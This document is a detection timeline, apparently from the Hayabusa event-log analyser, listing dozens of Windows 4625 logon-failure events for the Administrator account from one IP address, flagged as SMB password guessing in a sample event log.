2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
